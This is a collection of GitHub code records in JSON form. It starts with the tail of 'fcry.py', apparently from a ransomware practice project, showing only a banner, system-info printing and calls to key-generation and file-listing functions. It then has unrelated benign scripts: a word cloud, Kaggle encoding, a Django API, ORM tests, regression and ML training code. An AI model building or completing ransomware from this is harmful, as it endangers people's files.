██║ ██████╔╝ ╚████╔╝ |\" + Fore.RESET)\n\tprint(Fore.GREEN + \"| ██╔══╝ ██║ ██╔══██╗ ╚██╔╝ |\" + Fore.RESET)\n\tprint(Fore.GREEN + \"| ██║ ╚██████╗██║ ██║ ██║ |\" + Fore.RESET)\n\tprint(Fore.GREEN + \"| ╚═╝ ╚═════╝╚═╝ ╚═╝ ╚═╝ |\" + Fore.RESET)\n\tprint(Fore.GREEN + \"| |\" + Fore.RESET)\n\tprint(Fore.GREEN + \"+--------------------------------------------+\" + Fore.RESET)\n\n\tusuario = getuser()\n\tsistema = platform\n\n\tprint(Fore.CYAN + \"INFORMACIÓN GENERAL DEL SISTEMA\" + Fore.RESET + \"\\n\")\n\tprint(Back.GREEN + Fore.BLACK + \"Usuario:\" + Fore.RESET + Back.RESET + \" \" + Fore.GREEN + usuario + Fore.RESET + \"\\n\")\n\tprint(Back.YELLOW + Fore.BLACK + \"Sistema:\" + Fore.RESET + Back.RESET + \" \" + Fore.YELLOW + sistema + Fore.RESET + \"\\n\")\n\tgetListArch()\n\nif __name__ == '__main__':\n\tgenerarClave()\n\tind = \"= \"\n\ttry:\n\t\tfor l in 200:\n\t\t\tif ind == \"= \":\n\t\t\t\tind = \"== \"\n\t\t\telif ind == \"== \":\n\t\t\t\tind = \"===\"\n\t\t\telif ind == \"===\":\n\t\t\t\tind = \"====\"\n\t\t\telif ind == \"====\":\n\t\t\t\tind = \"=====\"\n\t\t\telse:\n\t\t\t\tind = \"= \"\n\t\t\tsleep(1)\n\t\t\tprint(Cursor.UP(1)+Cursor.FORWARD(2)+Fore.YELLOW + \"[ \" + ind + \" ]\" + \"Iniciando fcry.py\")\n\t\tif platform.startswith(\"win32\"):\n\t\t\tsystem(\"cls\")\n\t\telif platform.startswith(\"linux\"):\n\t\t\tsystem(\"clear\");\n\texcept:\n\t\tprint( Back.RED + \"Ocurrió un error!\" + Back.RESET)\n\tprint(\"\\n\")\n\tbanner()\n\tprint(\"\\n\")","repo_name":"Fernand117/RasomwarePractica","sub_path":"src/fcry.py","file_name":"fcry.py","file_ext":"py","file_size_in_byte":4823,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"17940334544","text":"import sqlite3\nimport matplotlib.pyplot as plt\nfrom wordcloud import WordCloud\nfrom PIL import Image\nimport numpy as np\nimport jieba\nfrom collections import Counter\n\ndb = sqlite3.connect(\"nkustnews.db\")\ndata = list() 
#創造空串列,新資料可以Append進來\nsql = \"select title from news;\" #把所有標題(title)都列出來,要做文字雲\nrows = db.execute(sql)\nfor row in rows:\n data.append(row[0]) #新資料Append進data串列\ndata = \";\".join(data) #將串列資料用分號(;)連在一起,導入新的data,此時新data資料型態變為字串(str),取代舊的被遺棄的data(串列list)\n#先處裡字典,再處理停用詞\njieba.load_userdict(\"dict.txt\") #先載入字典,避免特定關鍵字被切開\nwith open('stopWords.txt', 'rt', encoding='utf-8') as fp:\n stopwords = [word.strip() for word in fp.readlines()] #將記事本的停用詞清理成串列\n#設置迴圈將字典用字進入停用詞檢查,不重複通過才送入keyterms\nkeyterms = [keyterm for keyterm in jieba.cut(data) \n if keyterm not in stopwords \n and keyterm.strip()!=\"\" \n and keyterm.strip()!=\",\"]\ntext = \",\".join(keyterms)\nmask = np.array(Image.open('cloud.jpg'))\nwordcloud = WordCloud(background_color=\"white\",\n width=1000, height=860, \n margin=2, font_path=\"simhei.ttf\", \n mask=mask).generate(text)\nplt.figure(figsize=(10,10))\nplt.imshow(wordcloud)\nplt.axis(\"off\")\nplt.show()\n\n# 細節說明\n# res = jieba.cut(data) #用jieba切開,切完是interate不能print\n# res = [w for w in res] #用一個迴圈定義才能print","repo_name":"OtanChou/nkust110-aiot-day03","sub_path":"test15.py","file_name":"test15.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"74947585407","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n\n# For example, here's several helpful packages to load in \n\n\n\nimport numpy as np # linear algebra\n\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\nimport seaborn as sns\n\nimport matplotlib.pyplot as plt\n\nimport scipy as sp\n\nfrom scipy import stats\n\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn.linear_model import LogisticRegression\n\nfrom sklearn.metrics import accuracy_score\n\n# Input data files are available in the \"../input/\" directory.\n\n# For example, running this (by clicking run or pressing Shift+Enter) will list all files under the input directory\n\n\n\nimport os\n\nfor dirname, _, filenames in os.walk('/kaggle/input'):\n\n for filename in filenames:\n\n print(os.path.join(dirname, filename))\n\n\n\n# Any results you write to the current directory are saved as output.\n# load data ets in to note book\n\ndf_test = pd.read_csv('/kaggle/input/cat-in-the-dat/test.csv')\n\ndf_train = pd.read_csv('/kaggle/input/cat-in-the-dat/train.csv')\n\ndf_sub = pd.read_csv('/kaggle/input/cat-in-the-dat/sample_submission.csv')\n\nprint('test data set',df_test.shape)\n\nprint('train data set',df_train.shape)\n\ndf_sub.shape\npd.set_option('display.max_rows', 500)\n\npd.set_option('display.max_columns', 500)\n\npd.set_option('display.width', 1000)\n\ndf_train.head()\n# deep look into bin lables...\n\n\n\nbin_cols = ['bin_0', 'bin_1', 'bin_2', 'bin_3', 'bin_4']\n\n# loop to get column and the count of plots\n\nfor n, col in enumerate(df_train[bin_cols]): \n\n plt.figure(n)\n\n sns.countplot(x=col, data=df_train, hue='target', palette='husl')\n# let's converting the bin_3 and bin_4 into 0,1 \n\ndf_train['bin_3'] = df_train['bin_3'].replace(to_replace=['F', 'T'], value=['0', '1']).astype(int)\n\ndf_train['bin_4'] = df_train['bin_4'].replace(to_replace=['Y', 'N'], value=['1', '0']).astype(int)\n\n# test data set\n\ndf_test['bin_3'] = df_test['bin_3'].replace(to_replace=['F', 'T'], value=['0', '1']).astype(int)\n\ndf_test['bin_4'] = df_test['bin_4'].replace(to_replace=['Y', 'N'], 
value=['1', '0']).astype(int)\n# checking the data frame\n\ndf_train.head(2)\n#Drop ID and seperate target variable\n\ntarget = df_train['target']\n\ntrain_id = df_train['id']\n\ntest_id = df_test['id']\n\ndf_train.drop(['target', 'id'], axis=1, inplace=True)\n\ndf_test.drop('id', axis=1, inplace=True)\n\n\n\nprint(df_train.shape)\n\nprint(df_test.shape)\n# let's look at Nominal feartures..\n\nnom_cols = ['nom_0', 'nom_1', 'nom_2', 'nom_3', 'nom_4', 'nom_5', 'nom_6', 'nom_7', 'nom_8', 'nom_9']\n\nfrom sklearn import model_selection, preprocessing, metrics\n\nle = preprocessing.LabelEncoder()\n\ntraintest = pd.concat([df_train, df_test])\n\nfor i in nom_cols:\n\n print(\"The number of unique values in {} column is : {}\".format(i, df_train[i].nunique()) )\n\nfor col in nom_cols:\n\n traintest[col] = le.fit_transform(traintest[col])\n\n\n\ntrain_le = traintest.iloc[:df_train.shape[0], :]\n\ntest_le = traintest.iloc[df_train.shape[0]:, :]\n\n\n\nprint(train_le.shape)\n\nprint(test_le.shape)\ntrain_le.head()\n# nominal encoding with onehotencoder...\n\nfrom sklearn.preprocessing import OneHotEncoder\n\nOHE=OneHotEncoder()\n\ntrain_ohe1 = OHE.fit_transform(df_train)\n\ntest_ohe1 = OHE.fit_transform(df_test)\n\n\n\nprint(train_ohe1.shape)\n\nprint(train_ohe1.dtype)\n\nprint(test_ohe1.shape)\n\nprint(test_ohe1.dtype)\n# ordinal feature encoding technics...\n\nord_cols = ['ord_0', 'ord_1', 'ord_2', 'ord_3', 'ord_4', 'ord_5']\n\n\n\nfor i in ord_cols:\n\n print(\"The number of unique values in {} column is : {}\".format(i, df_train[i].nunique()) )\n\n print(\"The unique values in {} column is : \\n {}\".format(i, df_train[i].value_counts()[:5]))\n\n print('\\n')\nmapper_ord_1 = {'Novice': 1, 'Contributor': 2, 'Expert': 3, 'Master': 4, 'Grandmaster': 5}\n\n\n\nmapper_ord_2 = {'Freezing': 1, 'Cold': 2, 'Warm': 3, 'Hot': 4,'Boiling Hot': 5, 'Lava Hot': 6}\n\n\n\nmapper_ord_3 = {'a': 1, 'b': 2, 'c': 3, 'd': 4, 'e': 5, 'f': 6, 'g': 7, 'h': 8, \n\n 'i': 9, 'j': 10, 'k': 11, 'l': 12, 'm': 13, 'n': 14, 'o': 15}\n\n\n\nmapper_ord_4 = {'A': 1, 'B': 2, 'C': 3, 'D': 4, 'E': 5, 'F': 6, 'G': 7, 'H': 8, \n\n 'I': 9, 'J': 10, 'K': 11, 'L': 12, 'M': 13, 'N': 14, 'O': 15,\n\n 'P': 16, 'Q': 17, 'R': 18, 'S': 19, 'T': 20, 'U': 21, 'V': 22, \n\n 'W': 23, 'X': 24, 'Y': 25, 'Z': 26}\n\n\n\nfor col, mapper in zip(['ord_1', 'ord_2', 'ord_3', 'ord_4'], [mapper_ord_1, mapper_ord_2, mapper_ord_3, mapper_ord_4]):\n\n df_train[col+'_oe'] = df_train[col].replace(mapper)\n\n df_test[col+'_oe'] = df_test[col].replace(mapper)\n\n df_train.drop(col, axis=1, inplace=True)\n\n df_test.drop(col, axis=1, inplace=True)\n# ord_5, we have high cardinality\n\nfrom sklearn.preprocessing import OrdinalEncoder\n\nencoder = OrdinalEncoder(categories='auto')\n\nencoder.fit(df_train.ord_5.values.reshape(-1, 1))\n\ndf_train.ord_5 = encoder.transform(df_train.ord_5.values.reshape(-1, 1))\n\ndf_test.ord_5 = encoder.transform(df_test.ord_5.values.reshape(-1, 1))\ndf_train.ord_5[:5]\ndf_train[['ord_1_oe','ord_2_oe','ord_3_oe','ord_4_oe','ord_5','ord_0']].info()\ndef logistic(X,y):\n\n X_train,X_test,y_train,y_test=train_test_split(X,y,random_state=32,test_size=0.2)\n\n lr=LogisticRegression()\n\n lr.fit(X_train,y_train)\n\n y_pre=lr.predict(X_test)\n\n print('Accuracy : ',accuracy_score(y_test,y_pre))\nlogistic(train_ohe1,target)\n\n\nx_train_ohe,x_test_ohe,y_train_ohe,y_test_ohe=train_test_split(train_ohe1,target,random_state=42,test_size=0.2)\nlr=LogisticRegression()\n\nlr.fit(x_train,y_train)\n\ny_pre=lr.predict(x)\n\nprint('Accuracy : 
',accuracy_score(y_test,y_pre))\ndf_sub['target'] = y_pre\n\ndf_sub.to_csv('lgb_model.csv', index=False)\n\nlen(df_sub)\ndf_sub.shape\ndf_sub['target'].shape","repo_name":"aorursy/new-nb-2","sub_path":"cserajendra_deep-drive-into-encoding-tech-s.py","file_name":"cserajendra_deep-drive-into-encoding-tech-s.py","file_ext":"py","file_size_in_byte":5808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"1998592925","text":"import os\nimport sys\n\nfrom arakhne.settings import Defaults\n\n\nclass BaseFile:\n filetype = 'base'\n settings = Defaults.FILES_ALL\n\n def __init__(self, corpus, settings=None):\n self.corpus = corpus\n if settings:\n self.settings.update(settings)\n\n def update(\n self,\n prefix_msg,\n counter,\n postscript_msg='',\n ):\n if not prefix_msg and not counter:\n sys.stdout.write('\\n')\n return True\n message = '\\r'\n message += str(prefix_msg) + \" \" + str(counter)\n message += \" \" + str(postscript_msg)\n sys.stdout.write(message)\n return True\n\n def mk_path(self, path):\n # Return built absolute path if relative path sent\n if self.settings['path_type'] == 'relative':\n return os.path.join(os.getcwd(), path)\n return path\n\n def exists(self, path):\n return os.path.exists(path)\n\n def test_load(self, path):\n if not self.exists(path):\n raise OSError('No file found at that location')\n\n def test_save(self, path):\n if self.exists(path) and not self.settings['overwrite']:\n raise OSError('File already exists and overwrite not specified')\n","repo_name":"thePortus/arakhne","sub_path":"arakhne/corpus/files/base_file.py","file_name":"base_file.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"43289522645","text":"# 다른 사람 풀이 1\nfrom collections import deque\ndef solution(people, limit):\n answer = 0\n deq = deque(sorted(people))\n while deq:\n if len(deq) == 1:\n answer += 1\n break\n if deq[0] + deq[-1] <= limit:\n deq.pop()\n deq.popleft()\n else:\n deq.pop()\n answer += 1\n return answer\n \n# 다른 사람 풀이 2\ndef solution(people, limit) :\n answer = 0\n people.sort()\n\n a = 0\n b = len(people) - 1\n while a < b :\n if people[b] + people[a] <= limit :\n a += 1\n answer += 1\n b -= 1\n return len(people) - answer\n","repo_name":"Juhyun22/Coding_Test","sub_path":"programmers/탐욕법/구명보트.py","file_name":"구명보트.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"24597947474","text":"from django.shortcuts import get_object_or_404, render\nfrom django.http import HttpResponse, JsonResponse, response\nfrom .models import Problem, Solution\nfrom .serializers import ProblemSerializer, SolutionSerializer\n\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\n\n\n@api_view([\"GET\"])\ndef apiOverview(request):\n api_urls = {\n \"List problems\": \"/problem/list/\",\n \"View problem\": \"/problem/details//\",\n \"Create problem\": \"/problem/create/\",\n \"Update problem\": \"/problem/update//\",\n \"Delete problem\": \"/problem/delete//\",\n \"List solutions\": \"/solution/list//\",\n }\n\n return Response(api_urls)\n\n\n@api_view([\"GET\"])\ndef problemList(request):\n problems = Problem.objects.all()\n serializer = ProblemSerializer(problems, many=True)\n return Response(serializer.data)\n\n\n@api_view([\"GET\"])\ndef problemDetail(request, pk):\n problem = 
get_object_or_404(Problem, id=pk)\n serializer = ProblemSerializer(problem, many=False)\n return Response(serializer.data)\n\n\n@api_view([\"POST\"])\ndef problemCreate(request):\n serializer = ProblemSerializer(data=request.data)\n print(serializer)\n print(serializer.is_valid())\n if serializer.is_valid():\n serializer.save()\n\n return Response(serializer.data)\n\n\n@api_view([\"POST\"])\ndef problemUpdate(request, pk):\n problem = get_object_or_404(Problem, id=pk)\n serializer = ProblemSerializer(instance=problem, data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n\n return Response(serializer.data)\n\n\n@api_view([\"DELETE\"])\ndef problemDelete(request, pk):\n problem = get_object_or_404(Problem, id=pk)\n problem.delete()\n return Response(\"Problem succsesfully deleted.\")\n\n\n@api_view([\"GET\"])\ndef solutionList(request, pk):\n problem = get_object_or_404(Problem, id=pk)\n solutions = problem.solution_set.all()\n serializer = SolutionSerializer(solutions, many=True)\n return Response(serializer.data)","repo_name":"andreikovacs03/Evaluator","sub_path":"backend/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"12469339911","text":"# ex-080 - Lista ordenada sem Repetição.\n\nlista = []\nfor cont in range(5):\n n = int(input('Digite um número: '))\n if cont == 0 or n > lista[-1]: # Se cont for o primeiro 'ou' n for maior que o ultimo da lista:\n lista.append(n)\n else:\n pos = 0\n while pos < len(lista):\n if n <= lista[pos]:\n lista.insert(pos, n)\n break\n pos += 1\nprint(f'{\"Lista em Ordem\":-^20}')\nprint(f'{lista}')\n","repo_name":"Israel-covello/Python3-studies","sub_path":"pythonProject/Exercicios_3/ex-080.py","file_name":"ex-080.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"44215878026","text":"# -*- coding: utf-8 -*-\n# 16/7/11\n# create by: snower\n\nimport datetime\nfrom tornado.testing import gen_test\nfrom . 
import BaseTestCase\nfrom .model import Test\n\nclass TestQueryTestCase(BaseTestCase):\n @gen_test\n async def test(self):\n await Test.delete()\n\n await Test.create(id=1, data=\"test\", created_at=datetime.datetime.now(), updated_at=datetime.datetime.now())\n await Test.create(id=2, data=\"test\", created_at=datetime.datetime.now(), updated_at=datetime.datetime.now())\n\n c = await Test.select().count()\n assert c == 2, ''\n\n data = [i for i in (await Test.select())]\n assert len(data) == 2, ''\n\n data = []\n async for i in Test.select():\n data.append(i)\n assert len(data) == 2, ''\n\n data = [i for i in (await Test.select().where(Test.id>0))]\n assert len(data) == 2, ''\n\n data = [i for i in (await Test.select(Test.data).group_by(Test.data))]\n assert len(data) == 1, ''\n\n data = [i for i in (await Test.select().limit(1))]\n assert len(data) == 1, ''\n\n data = [i for i in (await Test.select().order_by(Test.id.desc()))]\n assert data[0].id == 2\n\n t = await Test.select().order_by(Test.id.desc()).first()\n t.data = \"aaa\"\n await t.save()\n t = await Test.select().order_by(Test.id.desc()).first()\n assert t.data == 'aaa'\n\n t = await Test.select().order_by(Test.id.desc()).first()\n await t.delete_instance()\n t = await Test.select().where(Test.id == t.id).first()\n assert t is None\n\n await Test.update(data = '12345')\n t = await Test.select().order_by(Test.id.desc()).first()\n assert t.data == '12345', ''\n\n await Test.delete()\n c = await Test.select().count()\n assert c == 0, ''","repo_name":"snower/torpeewee","sub_path":"tests/test_query.py","file_name":"test_query.py","file_ext":"py","file_size_in_byte":1825,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"42"} +{"seq_id":"4995107786","text":"# v2020.03.19v2\n# created by yifan\n\nimport numpy as np\nfrom sklearn.metrics import accuracy_score\nfrom numpy import inf\nfrom sklearn.metrics import mean_squared_error\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\n\n\nclass LLSR():\n def __init__(self, onehot=True, normalize=False):\n self.onehot = onehot\n self.normalize = normalize\n self.coeff = []\n self.weight = []\n self.trained = False\n\n # weighted least square\n def fit(self, X, Y):\n if self.onehot == True:\n y = np.zeros((X.shape[0], np.unique(Y).shape[0]))\n y[np.arange(Y.size), Y] = 1\n Y = y.copy()\n\n\n\n bin_edge = np.linspace(-1, 1, 21, endpoint=True)\n counts, _ = np.histogram(Y, bins=bin_edge)\n\n freq = counts/Y.shape[0]\n\n idx = np.zeros((len(counts)+1), dtype=int) # 21\n for i in range(len(counts)+1):\n idx[i] = np.sum(counts[:i])\n\n W = np.zeros((Y.shape[0]))\n for i in range(len(idx)-1):\n for j in range(idx[i], idx[i+1]):\n W[j] = 1/max(freq[i], 0.001)\n\n\n # X_pos = X[Y>0]\n # X_neg = X[Y<0]\n # Y_pos = Y[Y>0]\n # Y_neg = Y[Y<0]\n #\n # X_reorder = np.concatenate((X_pos, X_neg), axis=0)\n # Y_reorder = np.concatenate((Y_pos, Y_neg), axis=0)\n #\n # km_p = KMeans(n_clusters=10).fit(Y_pos.reshape(Y_pos.shape[0], 1))\n # km_n = KMeans(n_clusters=10).fit(Y_neg.reshape(Y_neg.shape[0], 1))\n #\n # freq_p = np.zeros((10))\n # freq_n = np.zeros((10))\n #\n # pos_clus_labels = km_p.labels_\n # neg_clus_labels = km_n.labels_\n #\n # for i in range(10):\n # freq_p[i] = len(Y_pos[pos_clus_labels == i]) / len(Y_pos)\n # freq_n[i] = len(Y_neg[neg_clus_labels == i]) / len(Y_neg)\n #\n # W = np.zeros((Y.shape[0]))\n #\n # for i in range(Y_pos.shape[0]):\n # label = km_p.predict(Y_pos[i].reshape(1, 1))\n # W[i] = 1/(freq_p[label] + 0.001)\n # for j 
in range(Y_neg.shape[0]):\n # label = km_n.predict(Y_neg[j].reshape(1, 1))\n # W[Y_pos.shape[0] + j] = 1/(freq_n[label] + 0.001)\n\n\n\n\n\n\n # W = np.ones((Y.shape[0]))\n\n self.weight = W\n\n WX = np.zeros((X.shape))\n WY = np.zeros((Y.shape))\n for i in range(X.shape[0]):\n WX[i] = W[i] * np.array(X[i])\n WY[i] = W[i] * np.array(Y[i])\n\n # if Y.shape[0] == 986864:\n # plt.figure()\n # edge = np.linspace(np.min(WY), np.max(WY), 41, endpoint=True)\n # n_p, bins_p, patches_p = plt.hist(x=WY, bins=edge, color='b', rwidth=0.9, density=True, label=\"spliced pixels\")\n #\n # plt.grid(axis='y')\n # plt.xlabel('Value')\n # plt.ylabel('Frequency')\n # plt.title('histogram of weighted training Y')\n # # plt.legend()\n # plt.savefig('/mnt/yaozhu/image_splicing_mnt/Output_Mat_Files/regression_v1/channelwisepca/multi_resolution/features/' + \"1-2_resolution/ssl/histogram_1-2_lab_weighted_train_Y.png\")\n\n A = np.ones((WX.shape[0], 1))\n WX = np.concatenate((A, WX), axis=1)\n\n\n self.coeff = np.matmul(np.linalg.pinv(WX), WY)\n self.trained = True\n\n return self\n\n # def predict(self, X):\n # assert (self.trained == True), \"Must call fit first!\"\n # X = self.predict_proba(X)\n # return np.argmax(X, axis=1)\n\n def predict_proba(self, X):\n assert (self.trained == True), \"Must call fit first!\"\n A = np.ones((X.shape[0], 1))\n X = np.concatenate((A, X), axis=1)\n pred = np.matmul(X, self.coeff)\n if self.normalize == True:\n pred = (pred - np.min(pred, axis=1, keepdims=True)) / np.sum(\n (pred - np.min(pred, axis=1, keepdims=True) + 1e-15), axis=1, keepdims=True)\n return pred\n\n # def score(self, X, Y):\n # assert (self.trained == True), \"Must call fit first!\"\n # pred = self.predict(X)\n # return accuracy_score(Y, pred)\n\n def mse(self, X, Y):\n assert (self.trained == True), \"Must call fit first\"\n pred = self.predict_proba(X)\n return mean_squared_error(Y, pred, sample_weight=self.weight)\n\n\n\n\nif __name__ == \"__main__\":\n from sklearn import datasets\n from sklearn.model_selection import train_test_split\n\n print(\" > This is a test example: \")\n digits = datasets.load_digits()\n X = digits.images.reshape((len(digits.images), -1))\n print(\" input feature shape: %s\" % str(X.shape))\n X_train, X_test, y_train, y_test = train_test_split(X, digits.target, test_size=0.2, stratify=digits.target)\n\n clf = LLSR(onehot=True, normalize=True)\n clf.fit(X_train, y_train)\n print(\" --> train acc: %s\" % str(clf.score(X_train, y_train)))\n print(\" --> test acc: %s\" % str(clf.score(X_test, y_test)))\n print(\"------- DONE -------\\n\")","repo_name":"ZhengWenSEC2023/Image-Steganalysis","sub_path":"previous_trial/LLSR_yifan.py","file_name":"LLSR_yifan.py","file_ext":"py","file_size_in_byte":4962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"12379413215","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import timedelta\n\n\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import ValidationError\n\n\nclass SpaceSchedule(models.TransientModel):\n _name = 'space.schedule.statistics'\n _description = 'Auxiliary model to get schedule statistics.'\n\n start_datetime = fields.Datetime(\n default=fields.Datetime.now(),\n required=True,\n )\n stop_datetime = fields.Datetime(\n default=fields.Datetime.now(),\n required=True,\n )\n space_id = fields.Many2one(\n comodel_name='space',\n )\n schedule_ids = fields.Many2many(\n comodel_name=\"space.schedule\",\n readonly=True,\n )\n\n def get_lines(self):\n SpaceSchedule = 
self.env['space.schedule']\n filter = [\n ('start_datetime', '>=', self.start_datetime),\n ('stop_datetime', '<=', self.stop_datetime),\n ]\n if self.space_id:\n filter.append(\n ('space_id', '=', self.space_id.id)\n )\n self.schedule_ids = SpaceSchedule.search(filter)\n return {\n 'context': self.env.context,\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_model': self._name,\n 'res_id': self.id,\n 'view_id': False,\n 'type': 'ir.actions.act_window',\n 'target': 'new',\n }\n","repo_name":"jlira-estrasol/lunaria","sub_path":"addons/space_control/models/space_schedule_statistics.py","file_name":"space_schedule_statistics.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"25405135771","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# Author: lihuiru\n# Created on 2023/11/18 20:29\nfrom collections import Counter\nimport pandas as pd\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom joblib import dump\n\n# Import the latest feature ranking list based on RFE\ndata = pd.read_csv('../data/max_AUC.csv')\nmu = data.loc[:, 'features'].str.cat(sep=',')\nlst = mu.split(',')\nlst = [i.strip() for i in lst]\n\n# Sort features based on their occurrence frequency in descending order\nkeys_sorted = sorted(Counter(lst).keys(), key=Counter(lst).get, reverse=True)\n\n# Load your data\ndf = pd.read_csv('../data/mutation_matrix2.0.csv')\n\n# Drop rows with any NaN values\ndf = df.dropna()\n\n# Map string labels to integers\ndf.iloc[:, -1] = df.iloc[:, -1].map({'Virulent': 0, 'Avirulent': 1})\n\n# Ensure the labels are integers\ndf.iloc[:, -1] = df.iloc[:, -1].astype(int)\n\n# Separate features and labels\nX = df.iloc[:, 1:-1]\ny = df.iloc[:, -1]\n\n# The number representing the top N features selected during cross-validation\nnum = 11\n\n# Initialize a DataFrame to store results\nresults = pd.DataFrame(columns=['Seed', 'Accuracy', 'Precision', 'Recall', 'F1 Score', 'AUC'])\nseed = 42 # Random seed for reproducibility\n\n# Split data into training and test sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=seed)\n\n# Select Top-N features\nX_train_selected = X_train[keys_sorted[:num]]\nX_test_selected = X_test[keys_sorted[:num]]\n\n# Initialize and train the model\nmodel = RandomForestClassifier(random_state=seed)\nmodel.fit(X_train_selected, y_train)\n\n# Predict and evaluate\ny_pred = model.predict(X_test_selected)\ny_pred_proba = model.predict_proba(X_test_selected)[:, 1]\n\n# Save the trained RandomForest model to disk\ndump(model, '../model/random_forest_model.joblib')\n\n# # Save the top N features used for training the model\n# dump(keys_sorted[:num], 'model/top_features.joblib')\n","repo_name":"lihuirull/FluVirulencePredictor","sub_path":"fluvp/train_new_model.py","file_name":"train_new_model.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"17384879216","text":"# -*- coding: utf-8 -*-\nimport re;\nimport urllib3\nimport urllib\nfrom urllib.parse import quote\nimport string\n\nurl_format = 'https://baike.baidu.com/item/'\n\nitem_name = '阿尔伯特·爱因斯坦'\n\nurl = url_format + item_name\n\nurl = quote(url,safe=string.printable)\n\nhttp = urllib3.PoolManager()\nr = http.request('GET', url)\nf = open( item_name + '.baike.html', 'wb+')\nf.write(r.data)\nf.close()\n\n\nhtml = 
(r.data).decode('utf-8');\nbaidu_cache_urls = re.findall(r'(https://.+?)/.*', html)\nprint(baidu_cache_urls)","repo_name":"Gavin12c/python","sub_path":"spider-course-4-master/baidu/baike.py","file_name":"baike.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"30003577790","text":"import os\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nimport argparse\nimport time\nimport datetime\nimport sys\nimport math\nimport scipy.io as scio\nimport numpy as np\nfrom skimage import io\n\nimport random\n\nfrom DWonder.SEG.data_process import train_preprocess_lessMemory_seg, shuffle_datasets_lessMemory\nfrom DWonder.SEG.network import SEG_Network_3D_Unet\nfrom DWonder.SEG.utils import FFDrealign4, inv_FFDrealign4\n#############################################################################################################################################\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--epoch\", type=int, default=0, help=\"epoch to start training from\")\nparser.add_argument(\"--n_epochs\", type=int, default=100, help=\"number of training epochs\")\nparser.add_argument('--GPU', type=int, default=3, help=\"the index of GPU you will use for computation\")\nparser.add_argument('--cuda', action='store_true', help='use GPU computation')\nparser.add_argument('--output_dir', type=str, default='results', help=\"the output folder\")\n\nparser.add_argument('--img_w', type=int, default=512, help=\"\")\nparser.add_argument('--img_h', type=int, default=512, help=\"\")\nparser.add_argument('--input_nc', type=int, default=1, help=\"\")\nparser.add_argument('--output_nc', type=int, default=1, help=\"\")\nparser.add_argument('--f_maps', type=int, default=1, help=\"\")\nparser.add_argument('--frame_num', type=int, default=1, help=\"\")\n\nparser.add_argument('--lr', type=float, default=0.0001, help='initial learning rate')\nparser.add_argument(\"--b1\", type=float, default=0.5, help=\"adam: decay of first order momentum of gradient\")\nparser.add_argument(\"--b2\", type=float, default=0.999, help=\"adam: decay of first order momentum of gradient\")\nparser.add_argument('--normalize_factor', type=int, default=10000, help='actions: train or predict')\n\nparser.add_argument('--datasets_folder', type=str, default='rawdata', help=\"the name of your project\")\nparser.add_argument('--datasets_path', type=str, default='datasets', help=\"the name of your project\")\nparser.add_argument('--input_folder', type=str, default='image', help=\"\")\nparser.add_argument('--GT_folder', type=str, default='mask', help=\"\")\nparser.add_argument('--pth_path', type=str, default='SEG_pth', help=\"the name of your project\")\nparser.add_argument('--train_datasets_size', type=int, default=1000, help='actions: train or predict')\n\nopt = parser.parse_args()\nprint('the parameter of your training ----->')\nprint(opt)\n########################################################################################################################\nif not os.path.exists(opt.output_dir): \n os.mkdir(opt.output_dir)\ncurrent_time = 'TS3DUnetFFD_'+opt.datasets_path+'_'+opt.datasets_folder \\\n +'_ic'+str(opt.input_nc)+'_oc'+str(opt.output_nc)+'_lr'+str(opt.lr)+'_fm'+str(opt.f_maps)+'_'+datetime.datetime.now().strftime(\"%Y%m%d-%H%M\")\n\noutput_path = opt.output_dir + '//' + current_time\npth_folder = opt.pth_path+'//'+ current_time\n\nprint('output_path ---> 
